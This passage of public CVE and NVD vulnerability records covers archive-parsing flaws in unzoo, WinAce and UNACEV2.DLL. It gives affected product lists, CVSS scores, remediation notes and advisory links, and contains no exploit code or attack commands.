              "matchCriteriaId": "2F3B1651-DC3E-43B8-A5A4-8BEF7D668EEC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
              "matchCriteriaId": "DF2D8C10-01E4-43D7-93EE-342BA7E9C489",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D0980CA-26A4-468E-82F3-E03953250343",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
              "matchCriteriaId": "AAB7888A-E884-4C73-AF10-698C56E080F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF5B2325-D8EE-4D1E-8291-740726FC1EF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB0EF168-1F0D-4772-8922-0A75CAF28661",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
              "matchCriteriaId": "1F7F2957-4422-4891-B573-F68882D7C8E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
              "matchCriteriaId": "5CAED694-2497-488B-A2AB-0781501678F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FDD00670-7EC0-4AA4-98EF-C8AE38330284",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
              "matchCriteriaId": "C23C179C-B50E-4F47-BFFA-85848131C99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C813AD8-5D73-41DF-B710-3CEB20FB9EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B38A75AF-D8B4-4B54-87E9-6EED562CAAC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
              "matchCriteriaId": "5DB520B5-36E8-4F4B-99FF-0FF3F708CC8A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
              "matchCriteriaId": "BECD1C6B-EC0F-4203-BA12-F8B02472FF4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD267D52-D580-4460-AFF9-E5BA478A98FA",
              "versionEndIncluding": "7.3.0.5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
              "matchCriteriaId": "64D94528-A54F-439B-8584-57A82CDF7318",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
              "matchCriteriaId": "DB66A5A4-6758-438D-9155-7475A5406DA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9F9AF4F-E974-4D6F-AF51-0DA7A59E64FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4DBEED1-0648-45F3-AFC2-91C872A1B098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6AD36471-D8DC-4B11-B53B-264AB1560063",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "79845C9F-7884-4F77-B492-4A944D3DCCEA",
              "versionEndIncluding": "2.10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "B93C2E82-03E5-42CE-A589-B82FBCBE7D52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "BF7B6EE8-25D5-4C89-A0B8-A069D330A9D9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0D03D666-D234-4626-82F9-EC5726BE1920",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
              "matchCriteriaId": "D0BEEFB2-C6ED-43D5-B535-623931C38890",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2ECF7F8-A29F-4868-9DE5-4227E5DA2285",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A897043-9003-4F27-8C7D-AE6B2BD0389C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F05FEF8-6B34-4874-AD6B-A053415BD939",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
              "matchCriteriaId": "D28FAD61-3723-4CCC-B890-C5869E7AC3EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
              "matchCriteriaId": "7697AAC2-EC8A-496E-9336-29AAE61CD69E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAA47F3A-44BA-4011-8A44-1AE54D02E772",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
              "matchCriteriaId": "423620AD-EA6A-4730-B97A-DF67247372BE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
    },
    {
      "lang": "es",
      "value": "El archivo unzoo.c, tal como se utiliza en varios productos, incluyendo AMaViS versi\u00f3n 2.4.1 y anteriores, permite a los atacantes remotos causar una denegaci\u00f3n de servicio (bucle infinito) por medio de un archivo ZOO con una estructura direntry que apunta hacia un archivo anterior."
    }
  ],
  "evaluatorSolution": "http://xforce.iss.net/xforce/xfdb/34080\r\n\r\n\r\nFor Barracuda Spam Firewall:\r\nUpgrade to the latest virus definition version of Barracuda Spam Firewall (virusdef 2.0.6399 for 3.4 and after or virusdef 2.0.6399o for prior to 3.4), available from the automatic update.\r\n\r\nFor Panda Software Antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4/2/2007 or later), available from the automatic update feature.\r\n\r\nFor avast! antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4.7.981 or later), available from the avast! antivirus Web site. See references.\r\n\r\nFor Avira AntiVir:\r\nUpgrade to the latest version of Avira AntiVir (avpack32.dll version 7.3.0.6 or later), available from the automatic update feature.\r\n\r\nFor AMaViS:\r\nRefer to ASA-2007-2 for patch, upgrade, or suggested workaround information. See References.",
  "id": "CVE-2007-1673",
  "lastModified": "2024-11-21T00:28:54.050",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-05-09T01:19:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/36208"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25315"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.amavis.org/security/asa-2007-2.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/36208"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25315"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/2680"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.amavis.org/security/asa-2007-2.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/23823"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

cve-2007-1673
Vulnerability from cvelistv5
Published
2007-05-09 01:00
Modified
2024-08-07 13:06
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
References
http://www.amavis.org/security/asa-2007-2.txtx_refsource_CONFIRM
https://exchange.xforce.ibmcloud.com/vulnerabilities/34080vdb-entry, x_refsource_XF
http://osvdb.org/36208vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/23823vdb-entry, x_refsource_BID
http://secunia.com/advisories/25315third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/467646/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://securityreason.com/securityalert/2680third-party-advisory, x_refsource_SREASON
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T13:06:25.976Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.amavis.org/security/asa-2007-2.txt"
          },
          {
            "name": "multiple-vendor-zoo-dos(34080)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
          },
          {
            "name": "36208",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/36208"
          },
          {
            "name": "23823",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/23823"
          },
          {
            "name": "25315",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25315"
          },
          {
            "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
          },
          {
            "name": "2680",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2680"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-04-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.amavis.org/security/asa-2007-2.txt"
        },
        {
          "name": "multiple-vendor-zoo-dos(34080)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
        },
        {
          "name": "36208",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/36208"
        },
        {
          "name": "23823",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/23823"
        },
        {
          "name": "25315",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25315"
        },
        {
          "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
        },
        {
          "name": "2680",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2680"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-1673",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.amavis.org/security/asa-2007-2.txt",
              "refsource": "CONFIRM",
              "url": "http://www.amavis.org/security/asa-2007-2.txt"
            },
            {
              "name": "multiple-vendor-zoo-dos(34080)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
            },
            {
              "name": "36208",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/36208"
            },
            {
              "name": "23823",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/23823"
            },
            {
              "name": "25315",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25315"
            },
            {
              "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
            },
            {
              "name": "2680",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2680"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-1673",
    "datePublished": "2007-05-09T01:00:00",
    "dateReserved": "2007-03-24T00:00:00",
    "dateUpdated": "2024-08-07T13:06:25.976Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-6563
Vulnerability from cvelistv5
Published
2007-12-28 00:00
Modified
2024-08-07 16:11
Severity ?
Summary
Heap-based buffer overflow in WinAce 2.65 and earlier, and possibly other versions before 2.69, allows user-assisted remote attackers to execute arbitrary code via a long filename in a compressed UUE archive.
References
http://www.vupen.com/english/advisories/2007/4312vdb-entry, x_refsource_VUPEN
http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.htmlthird-party-advisory, x_refsource_JVNDB
http://www.securityfocus.com/bid/27017vdb-entry, x_refsource_BID
https://exchange.xforce.ibmcloud.com/vulnerabilities/39268vdb-entry, x_refsource_XF
http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225x_refsource_MISC
http://jvn.jp/jp/JVN%2344736880/index.htmlthird-party-advisory, x_refsource_JVN
http://osvdb.org/40267vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/28215third-party-advisory, x_refsource_SECUNIA
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T16:11:05.903Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2007-4312",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/4312"
          },
          {
            "name": "JVNDB-2007-000822",
            "tags": [
              "third-party-advisory",
              "x_refsource_JVNDB",
              "x_transferred"
            ],
            "url": "http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.html"
          },
          {
            "name": "27017",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/27017"
          },
          {
            "name": "winace-uue-bo(39268)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39268"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225"
          },
          {
            "name": "JVN#44736880",
            "tags": [
              "third-party-advisory",
              "x_refsource_JVN",
              "x_transferred"
            ],
            "url": "http://jvn.jp/jp/JVN%2344736880/index.html"
          },
          {
            "name": "40267",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/40267"
          },
          {
            "name": "28215",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/28215"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-12-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Heap-based buffer overflow in WinAce 2.65 and earlier, and possibly other versions before 2.69, allows user-assisted remote attackers to execute arbitrary code via a long filename in a compressed UUE archive."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-07T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2007-4312",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/4312"
        },
        {
          "name": "JVNDB-2007-000822",
          "tags": [
            "third-party-advisory",
            "x_refsource_JVNDB"
          ],
          "url": "http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.html"
        },
        {
          "name": "27017",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/27017"
        },
        {
          "name": "winace-uue-bo(39268)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39268"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225"
        },
        {
          "name": "JVN#44736880",
          "tags": [
            "third-party-advisory",
            "x_refsource_JVN"
          ],
          "url": "http://jvn.jp/jp/JVN%2344736880/index.html"
        },
        {
          "name": "40267",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/40267"
        },
        {
          "name": "28215",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/28215"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-6563",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Heap-based buffer overflow in WinAce 2.65 and earlier, and possibly other versions before 2.69, allows user-assisted remote attackers to execute arbitrary code via a long filename in a compressed UUE archive."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2007-4312",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/4312"
            },
            {
              "name": "JVNDB-2007-000822",
              "refsource": "JVNDB",
              "url": "http://jvndb.jvn.jp/contents/ja/2007/JVNDB-2007-000822.html"
            },
            {
              "name": "27017",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/27017"
            },
            {
              "name": "winace-uue-bo(39268)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39268"
            },
            {
              "name": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225",
              "refsource": "MISC",
              "url": "http://www.fourteenforty.jp/research/advisory.cgi?FFRRA-20071225"
            },
            {
              "name": "JVN#44736880",
              "refsource": "JVN",
              "url": "http://jvn.jp/jp/JVN%2344736880/index.html"
            },
            {
              "name": "40267",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/40267"
            },
            {
              "name": "28215",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/28215"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-6563",
    "datePublished": "2007-12-28T00:00:00",
    "dateReserved": "2007-12-27T00:00:00",
    "dateUpdated": "2024-08-07T16:11:05.903Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2005-2856
Vulnerability from cvelistv5
Published
2005-09-08 04:00
Modified
2024-08-07 22:53
Severity ?
Summary
Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive.
References
https://exchange.xforce.ibmcloud.com/vulnerabilities/26982vdb-entry, x_refsource_XF
http://securitytracker.com/id?1016512vdb-entry, x_refsource_SECTRACK
http://secunia.com/secunia_research/2006-24/advisoryx_refsource_MISC
http://www.vupen.com/english/advisories/2006/2824vdb-entry, x_refsource_VUPEN
http://securityreason.com/securityalert/49third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/19884vdb-entry, x_refsource_BID
https://exchange.xforce.ibmcloud.com/vulnerabilities/26479vdb-entry, x_refsource_XF
http://www.vupen.com/english/advisories/2006/1797vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/archive/1/434279/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://securitytracker.com/id?1014863vdb-entry, x_refsource_SECTRACK
http://securitytracker.com/id?1016011vdb-entry, x_refsource_SECTRACK
http://securitytracker.com/id?1016115vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/19939third-party-advisory, x_refsource_SECUNIA
http://secunia.com/secunia_research/2006-46/advisory/x_refsource_MISC
http://securitytracker.com/id?1016065vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/1835vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1016088vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/3495vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/19967third-party-advisory, x_refsource_SECUNIA
http://secunia.com/secunia_research/2006-27/x_refsource_MISC
http://securitytracker.com/id?1016177vdb-entry, x_refsource_SECTRACK
http://securitytracker.com/id?1016114vdb-entry, x_refsource_SECTRACK
https://exchange.xforce.ibmcloud.com/vulnerabilities/26272vdb-entry, x_refsource_XF
http://secunia.com/secunia_research/2006-50/advisory/x_refsource_MISC
http://www.securityfocus.com/archive/1/432579/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/19931third-party-advisory, x_refsource_SECUNIA
http://secunia.com/secunia_research/2006-36/advisoryx_refsource_MISC
http://secunia.com/secunia_research/2006-28/advisoryx_refsource_MISC
https://exchange.xforce.ibmcloud.com/vulnerabilities/26447vdb-entry, x_refsource_XF
http://secunia.com/advisories/19975third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/1775vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/16479third-party-advisory, x_refsource_SECUNIA
https://exchange.xforce.ibmcloud.com/vulnerabilities/26385vdb-entry, x_refsource_XF
https://exchange.xforce.ibmcloud.com/vulnerabilities/26116vdb-entry, x_refsource_XF
http://www.securityfocus.com/archive/1/436639/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://www.vupen.com/english/advisories/2006/1611vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/1681vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/archive/1/433693/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://www.vupen.com/english/advisories/2006/2184vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/1577vdb-entry, x_refsource_VUPEN
http://secunia.com/secunia_research/2006-33/advisory/x_refsource_MISC
http://secunia.com/secunia_research/2006-29/advisory/x_refsource_MISC
http://www.securityfocus.com/archive/1/434234/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/19938third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19581third-party-advisory, x_refsource_SECUNIA
https://exchange.xforce.ibmcloud.com/vulnerabilities/26302vdb-entry, x_refsource_XF
http://www.vupen.com/english/advisories/2006/1694vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/20270third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19890third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19977third-party-advisory, x_refsource_SECUNIA
https://exchange.xforce.ibmcloud.com/vulnerabilities/26142vdb-entry, x_refsource_XF
http://secunia.com/secunia_research/2006-38/advisoryx_refsource_MISC
http://secunia.com/advisories/19596third-party-advisory, x_refsource_SECUNIA
http://secunia.com/secunia_research/2005-41/advisory/x_refsource_MISC
http://securitytracker.com/id?1016066vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/archive/1/440303/100/0/threadedmailing-list, x_refsource_BUGTRAQ
